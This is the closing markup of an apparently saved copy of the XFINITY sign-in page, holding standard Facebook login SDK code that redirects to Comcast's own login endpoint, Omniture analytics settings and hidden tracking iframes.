            <div id="fb-root" class=" fb_reset"><script async="" src="Sign%20in%20to%20XFINITY_files/all.js"></script><div style="position: absolute; top: -10000px; height: 0px; width: 0px;"><div><iframe name="fb_xdm_frame_https" allowtransparency="true" allowfullscreen="true" scrolling="no" id="fb_xdm_frame_https" aria-hidden="true" title="Facebook Cross Domain Communication Frame" tabindex="-1" style="border: medium none;" src="Sign%20in%20to%20XFINITY_files/ao6eUeuGXQq.htm" frameborder="0"></iframe></div></div><div style="position: absolute; top: -10000px; height: 0px; width: 0px;"><div></div></div></div>
        <script type="text/javascript">
                            window.fbAsyncInit = function() {
                    FB.init({
                        appId: 161991040493541,
                        status: true,
                        cookie: true,
                        xfbml: true,
                        oauth: true});
                };
            
            function fblogin() {
                                    FB.login(callServer, {scope:'email'});
                            }

                            function callServer(response) {
                    if(response.authResponse) {
                        window.location="https://login.comcast.net/login?ipAddrAuthn=false&passive=false&client_id=my-xfinity&reqId=88ce4dc7-becd-4921-834c-7a309df3fbce&r=comcast.net&s=oauth&deviceAuthn=false&continue=https%3A%2F%2Flogin.comcast.net%2Foauth%2Fauthorize%3Fresponse_type%3Dcode%26redirect_uri%3Dhttps%253A%252F%252Fauth.xfinity.com%252Foauth%252Fcallback%26client_id%3Dmy-xfinity%26state%3Dhttp%253A%252F%252Fmy.xfinity.com%252F%253Fcid%253Dcust%26response%3D1&forceAuthn=0&lang=en&rm=2&ui_style=light&access_token="+response.authResponse.accessToken;
                    }else{
                        // user cancelled login
                    }
                }

                (function() {
                    var e = document.createElement('script');
                    e.async = true;
                    e.src = document.location.protocol+'//connect.facebook.net/en_US/all.js';
                    document.getElementById('fb-root').appendChild(e);
                }());
                    </script>
    

		<script type="text/javascript">
		
		</script>

		
					<div style="display:none">
<script type="text/javascript" src="Sign%20in%20to%20XFINITY_files/omniture_visId.js"></script>
<script type="text/javascript"><!--
	s.pageName="sign in"
	s.channel = "sign in"
	s.prop4 = "sign in"
	s.prop7 = "my-xfinity"
	s.prop33 = "comcast net"
	s.prop35 = "authentication"
	s.prop36 = "site:home"
	s.eVar36 = "site:home"
	s.eVar47 = "anonymous"
	s.eVar7 = "my-xfinity"
	s.events = "event11";
	
	/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
	var s_code=s.t();if(s_code)document.write(s_code);//-->
</script>
</div>
			

<iframe id="destination_publishing_iframe_comcastathena_1" style="display: none; width: 0px; height: 0px;" src="Sign%20in%20to%20XFINITY_files/dest5.htm" class="aamIframeLoaded"></iframe></body></html>